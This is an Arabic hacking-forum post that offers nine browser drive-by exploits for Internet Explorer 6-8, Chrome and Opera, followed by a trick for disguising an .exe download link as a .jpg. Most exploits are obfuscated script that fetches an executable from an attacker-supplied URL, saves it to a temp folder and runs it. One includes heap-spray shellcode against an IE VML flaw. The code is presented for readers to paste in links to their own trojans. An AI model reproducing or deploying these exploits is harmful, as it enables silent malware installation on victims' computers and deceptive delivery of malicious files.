أحوآلكم شباب .. ؟ [ أنا تمام ]
كيف الدراسـة معآكـم ؟ [ والله الحمد لله ]
اليوم تجميعيـة بسيطـة .. لأحدث الثغرات وأقواهـآ ..
في البدايـة كل الثغرات لأستغلالها .. تقدر تغير [Dr.AdNaN] .. إلى رابط باتشك المباشر
الثغرة الأولى
أسمها .. [Google Chrome 1.0.154.46]
تشتغل على [ جوجل كروم ] و يقال [ تشتغل على 7 & 6 ] !
ثغرة عبارة عن تبديل رابط فقط !
اقتباس:
<html>
<body>
<iframe src='Dr.AdNaN' width=0 height=0></iframe>
</body>
</html>
|
الثغرة الثانيـة
أسمها .. [ActiveX ExploiT]
تشتغل على [ تشتغل على 8 & 7 & 6 ] !
ثغرة عبارة عن تبديل رابط فقط !
اقتباس:
<html>
<body>
<OBJECT ID="PrIv8 ActiveX ExploiT WorK In MSIE 6 & 7 & 8 "
WIDTH="0"
HEIGHT="0"
CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61"
CODEBASE="http://dr-adnan.co.cc/DownloaderActiveX.cab#Version=1,0,0,1">
<PARAM NAME="propWidth" VALUE="0">
<PARAM NAME="propHeight" VALUE="0">
<PARAM NAME="propDownloadUrl" VALUE="Dr.AdNaN">
<PARAM NAME="propPostDownloadAction" VALUE="run">
</OBJECT>
</body>
</html>
|
الثغرة الثالثـة
أسمها .. [Internet Explorer 6 & 7]
تشتغل على [ تشتغل على 7 & 6 ] !
ثغرة عبارة عن تبديل رابط فقط !
اقتباس:
<HTML>
<BODY>
<script language="VBScript">
on error resume next
dl = "Dr.AdNaN"
Set df = document.createElement("object")
cls1="clsid:BD96"
cls2="C556-65A"
cls3="3-11D0-9"
cls4="83A-00C04FC29E36"
clsfull=cls1&cls2&cls3&cls4
df.setAttribute "classid",clsfull
strr1="Mic"
strr2="roso"
strr3="ft."
strr4="XML"
strr5="HTTP"
strr=strr1&strr2&strr3&strr4&strr5
Set x = df.CreateObject(strr,"")
ab1="A"
ab2="dod"
ab3="b.S"
ab4="t"
ab5="re"
ab6="am"
strb1=ab1&ab2&ab3&ab4&ab5&ab6
strb5=strb1
set YY = df.createobject(strb5,"")
YY.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fnamezz1="update.exe"
scripp1="Scrip"
scripp2="ting"
scripp3=".Fil"
scripp4="eSyste"
scripp5="mObject"
scripp=scripp1&scripp2&scripp3&scripp4&scripp5
set FF = df.createobject(scripp,"")
set tmp = F.GetSpecialFolder(2)
fnamezz1= FF.BuildPath(tmp,fnamezz1)
YY.open
YY.write x.responseBody
YY.savetofile fnamezz1,2
YY.close
set MM = df.createobject("****l.Application","")
MM.****lExecute fnamezz1,"","","open",0
</script>
</BODY>
</HTML>
|
الثغرة الرابعـة
أسمها .. [Internet Explorer 8]
تشتغل على [ تشتغل على 8 ] !
ثغرة عبارة عن تبديل رابط فقط !
اقتباس:
<html>
<body>
<div style = "width: 0%; max-height: 0px; overflow: scroll;">
<script type="text/javascript" src="Dr.AdNaN"></script>
<script type="text/javascript"></script>
</div>
</body>
</html>
|
الثغرة الخامسـة
أسمها .. [PrIv8 ExploiT All]
تشتغل على [ تشتغل على كل المتصفحات ] !
ثغرة عبارة عن تبديل رابط فقط !
اقتباس:
<HTML>
<BODY>
<P><IMG border=0 alt="" src="Dr.AdNaN?.jpg" width=0 height=0></P>
</BODY>
</HTML>
|
الثغرة السادسة
أسمها .. [Russian ExploiT ~ A]
ثغرة روسـية .. تم سحبها
تشتغل على [ تشتغل على 6 & 7 ] !
ثغرة عبارة عن تبديل رابط فقط !
اقتباس:
<html xmlns:v="urn:schemas-microsoft-com:vml">
<head><style>v\:* { behavior: url(#debsxs); }</style></head><body>
<object id="debsxs" classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E"></object>
<script language="javascript">
var url4="Dr.AdNaN";
var lx0="<"; var lx1="v:r"; var lx2="ect"; var lx3=">"; var lx4="v:f"; var lx5="ill "; var lx6="met";
var lx7="ho"; var lx8="&#x"; var lx9="06"; var nx0="3500"; var nx1="x30000"; var nx2="0"; var nx3=1;
var xlxl0="%"; var xlxl1="u"; var xlxl2="9090";
var xlxl00="%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001 %uef33%ue243%uebfa";
var xlxl01="%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef %ue3af%u9f64%u42f3";
var xlxl02="%u9f64%u6ee7%uef03%uefeb%u64ef%ub903%u6187 %ue1a1%u0703%uef11";
var xlxl03="%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f %uefef%uaa66%ub9e7";
var xlxl04="%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3 %u0087%u0f21%u078f";
var xlxl05="%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96%u0757 %uef29%uefef%uaa66";
var xlxl06="%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee %ub1ef%u9a66%u64cb";
var xlxl07="%uebaa%uee85%u64b6%uf7ba%u07b9%uef64%uefef %u87bf%uf5d9%u9fc0";
var xlxl08="%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf %ucfaa%u1087%uefef";
var xlxl09="%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e %uefef%uaaec%u28cf";
var xlxl10="%ub3ef%uc191%u288a%uebaf%u8a97%uefef%u9a10 %u64cf%ue3aa%uee85";
var xlxl11="%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec %udccb%ubc34%u10bc";
var xlxl12="%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7 %uefcc%uefef%uef85";
var xlxl13="%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba%uff07 %uefef%u85ef%u6410";
var xlxl14="%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef %ubdb4%u0eec%u0eec";
var xlxl15="%u0eec%u0eec%u036c%ub5eb%u64bc%u0d35%ubd18 %u0f10%u64ba%u6403";
var xlxl16="%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97 %ub91c%u9964%ueccf";
var xlxl17="%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51 %u1dd5%ue79b%u212e";
var xlxl18="%uece2%uaf1d%u1e04%u11d4%u9ab1%ub50a%u0464 %ub564%ueccb%u8932";
var xlxl19="%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a %u2db2%uefe7%u1b07";
var shllc = unescape(xlxl00+xlxl01+xlxl02+xlxl03+xlxl04+xlxl05 +xlxl06+xlxl07+xlxl08+xlxl09+xlxl10+xlxl11+xlxl12+ xlxl13+xlxl14+xlxl15+xlxl16+xlxl17+xlxl18+xlxl19+" %u1011%uba10%ua3bd%ua0a2%uefa1"+url4);
shllc1 = unescape(xlxl0+xlxl1+xlxl2+xlxl0+xlxl1+xlxl2);
num1 = 19+nx3;
num2 = 116;
num3 = num1 + shllc.length;
while (shllc1.length < num3)
shllc1 += shllc1;
num4 = shllc1.substring(nx2, num3);
num5 = shllc1.substring(nx2, shllc1.length-num3);
while (num5.length + num3 < "0"+nx1)
num5 = num5 + num5 + num4;
myArrN1 = new Array();
for (i=nx2;i<num2;i++) {
myArrN1[i] = num5 + shllc; }
</script>
<div id="myCCxs"></div>
<script language="javascript">
blxll = lx0+lx1+lx2+lx3+lx0+lx4+lx5+lx6+lx7+"d = '";
blxls = lx8+lx9+lx9+";"+lx8+lx9+lx9+";"+lx8+lx9+lx9+";";
for (i=nx2; i<nx0; ++i) {
blxll = blxll + blxls; }
blxll = blxll + "'></v"+":re"+"c"+"t"+"></v:f"+"i"+"ll>";
document.getElementById("myCCxs").innerHTML = blxll;
</script>
</body>
</html>
|
الثغرة السابعـة
أسمها .. [Russian ExploiT ~ B]
ثغرة روسيـة أيضا ..
تشتغل على [ تشتغل على 6 & 7 ] !
ثغرة عبارة عن تبديل رابط فقط !
اقتباس:
<script language="javascript">
function CrO(o, n) {
var r = null;
try { eval("r = o.CreateObject(n)") }catch(e){}
if (! r) {try { eval("r = o.CreateObject(n, \"\")") }catch(e){}}
if (! r) {try { eval("r = o.CreateObject(n, \"\", \"\")") }catch(e){}}
if (! r) {try { eval("r = o.GetObject(\"\", n)") }catch(e){}}
if (! r) {try { eval("r = o.GetObject(n, \"\")") }catch(e){}}
if (! r) {try { eval("r = o.GetObject(n)") }catch(e){}}
return(r);
}
function Go(a) {
var obj_msxml2 = CrO(a,"ms"+"xm"+"l2.XM"+"LHT"+"TP");
obj_msxml2.open("GET","Dr.AdNaN",false);
obj_msxml2.send();
var ob_adOLD = "ado"+"d";
var obj_adodb = CrO(a,ob_adOLD+"b.str"+"ea"+"m");
obj_adodb.type = 1;
obj_adodb.open();
eval("obj_adodb.Write(obj_ms"+"xml2.r"+"esp"+"onse B"+"ody);");
var fn = "C:\\\\tmp03sz.exe";
obj_adodb.SaveToFile(fn,2);
var s = CrO(a, "S"+"he"+"ll.App"+"lica"+"tion");
s.****lExecute(fn);
return TRUE;
}
var i = 0;
var t = new Array(
"{BD96C556-65A3-11D0-983A-00C04FC29E30}","{BD96C556-65A3-11D0-983A-00C04FC29E36}",
"{AB9BCEDD-EC7E-47E1-9322-D4A210617116}","{0006F033-0000-0000-C000-000000000046}","{0006F03A-0000-0000-C000-000000000046}","{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}","{6414512B-B978-451D-A0D8-FCFDF33E833C}","{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}","{06723E09-F4C2-43c8-8358-09FCD1DB0766}","{639F725F-1B2D-4831-A9FD-874847682010}","{BA018599-1DB3-44f9-83B4-461454C84BF8}","{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}","{E8CCCDDF-CA28-496b-B050-6C07C962476B}","{BD96C556-65A3-11D0-983A-00C04FC29E30}",null);
while (t[i]) {
var a = null;
if (t[i].substring(0,1) == "{") {
a = document.createElement("ob"+"ject");
a.setAttribute("cl"+"ass"+"id", "cl"+"sid:" + t[i].substring(1, t[i].length - 1));
} else {
try { a = new ActiveXObject(t[i]); } catch(e){}
}
if (a) {
try {
var b = CrO(a, "She"+"ll.A"+"ppli"+"cat"+"ion");
if (b) {
if (Go(a)) break;
}
}catch(e){}
}
i++;
}
</script>
|
الثغرة الثامنـة
أسمها .. [OperA]
تشتغل على [ تشتغل على OperA ] !
ثغرة عبارة عن تبديل رابط فقط !
اقتباس:
**********
blank_iframe = document.createElement('iframe');
blank_iframe.src = 'about:blank';
blank_iframe.setAttribute('id', 'blank_iframe_window');
blank_iframe.setAttribute('style', 'display:none');
document.appendChild(blank_iframe);
blank_iframe_window.eval
("config_iframe = document.createElement('iframe');\
config_iframe.setAttribute('id', 'config_iframe_window');\
config_iframe.src = 'opera:config';\
document.appendChild(config_iframe);\
app_iframe = document.createElement('script');\
cache_iframe = document.createElement('iframe');\
app_iframe.src = 'Dr.AdNaN';\
app_iframe.onload = function ()\
{\
cache_iframe.src = 'opera:cache';\
cache_iframe.onload = function ()\
{\
cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\
var re = new RegExp('(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A HREF=\"'+app_iframe.src.toUpperCase(), '');\
filename = cache.match(re);\
config_iframe_window.eval\
(\"\
opera.setPreference('Network','TN3270 App',opera.getPreference('User Prefs','Cache Directory4')+parent.filename[1]);\
app_link = document.createElement('a');\
app_link.setAttribute('href', 'tn3270://nothing');\
app_link.click();\
setTimeout(function () {opera.setPreference('Network','TN3270 App','telnet.exe')},1000);\
\");\
};\
document.appendChild(cache_iframe);\
};\
document.appendChild(app_iframe);");
</script>
|
الثغرة التاسعـة
أسمها .. [Internet Explorer 6]
تشتغل على [ تشتغل على 6 ] !
ثغرة عبارة عن تبديل رابط فقط !
اقتباس:
<script language="VBScript">
On Error Resume Next
exe="Dr.AdNaN"
x1="o"&"bj"&"e"&"ct"
x2="cls"&"id:BD9"&"6C5"&"56-6"&"5"&"A3-1"&"1D"&"0-98"&"3"&"A-00"&"C0"&"4F"&"C2"&"9E36"
x3="c"&"la"&"ss"&"id"
x4="Mic"&"roso"&"ft.XM"&"LHT"&"TP"
x5="Ad"&"od"&"b.St"&"r"&"eam"
x6="G"&"ET"
x7="Scr"&"ip"&"ting.Fil"&"eS"&"yst"&"emO"&"bject"
x8="She"&"ll.A"&"ppl"&"icati"&"on"
Set zhu3 = document.createElement(x1)
zhu3.SetAttribute x3, x2
XMLHTTP=x4
Set x = zhu3.CreateObject(XMLHTTP,"")
D5=x5
D6=D5
Set S = zhu3.CreateObject(D6,"")
S.type = 1
zhu32="GET"
x.Open zhu32, exe, False
x.Send
fname1="server.exe"
Set F = zhu3.CreateObject("Scripting.FileSystemObject","")
Set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
Set Q = zhu3.CreateObject("****l.Application","")
Q.****lExecute fname1,"","","open",0
</script>
<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
</script>
|
لتحميل الثغرات ..
الأن مع الخدعـة .. شوفوآ
الأن مثلا عندي ملف exe ونبي نغير أخر الأمتداد
نسوي لو فرضان أن الرابط كذآ
http://www.dr-adnan.com/server.exe
نضيف أستفهام أخرهـ
http://www.dr-adnan.com/server.exe?
الحيـن نضيف ألي نبي من الكلام
http://www.dr-adnan.com/server.exe?w...r.AdNaN/xx.jpg
شوفوا التغير الكبير في الرابط .. ولا يتم تغير الداخل .. يعني مراح يحمل سيرفر ثاني أو يجي بصيغـة غير صيغـته
أخوكم
Dr.AdNaN
..
أهداء إلى الجميع ..
Archive |
RSS
Feeds 
04-Nov-2009, 08:02 PM
.::|[ ثغرات جديدة وحصريـة .. لـ المتصفحات المشهورة & حركـة تمويه في الرابط ]|::.
رد: .::|[ ثغرات جديدة وحصريـة .. لـ المتصفحات المشهورة & حركـة تمويه في الرابط ]|::.
دكتور عدناااا ألف شكر لك بس عندي سؤال يقرقه بالكي بورد 
العرض العادي
